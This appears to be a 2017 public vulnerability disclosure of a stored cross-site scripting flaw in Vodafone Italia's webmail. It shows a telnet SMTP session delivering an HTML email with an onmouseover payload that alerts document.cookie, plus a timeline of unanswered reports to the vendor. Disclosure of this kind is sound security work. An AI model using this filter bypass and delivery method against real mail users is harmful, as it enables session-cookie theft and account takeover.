# Title: Vodafone Webmail - Stored Cross-Site Scripting # Date: 2017-07-14 # Exploit Author: theMiddle / https://github.com/theMiddleBlue # Website: https://web.mail.vodafone.it 1. Description the Vodafone Italia webmail (web.mail.vodafone.it) suffers from a stored cross-site scripting vulnerability. The XSS-Filters can be eluded, and the vulnerability can be exploited, by sending an e-mail message with a specific format that will be shown below. After years of no-answer from Vodafone, I decided to disclose it in order to alert users and companies that use this webmail. 2. Exploit vulnerability ------------------------------------------- # telnet mx.vodafone.arubamail.it 25 Trying 62.149.178.10... Connected to mx.vodafone.arubamail.it. Escape character is '^]'. 220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready HELO example.com 250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you MAIL FROM: themiddle@protonmail.ch 250 2.1.0 <themiddle@protonmail.ch> sender ok RCPT TO: *****@vodafone.it 250 2.1.5 <*****@vodafone.it> recipient ok DATA 354 enter mail, end with "." on a line by itself Subject: test xss From: theMiddle <themiddle@protonmail.ch> To: *****@vodafone.it Content-Type: text/html; charset=utf-8 <div onmouseover ="alert(document.cookie);" style ="height:600px;"> test </div> . 250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery QUIT 221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection Connection closed by foreign host. -------------------------------------------- A screenshot of the executed javascript on Chrome Browser: http://i.imgur.com/Ap4NK9c.png 3. Timeline 2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received). 2015-06-25: Second contact via social network (no answer received). 2017-07-13: Third e-mail to italy.abuse@mail.vodafone.it (no answer received). 2017-07-14: Disclosure.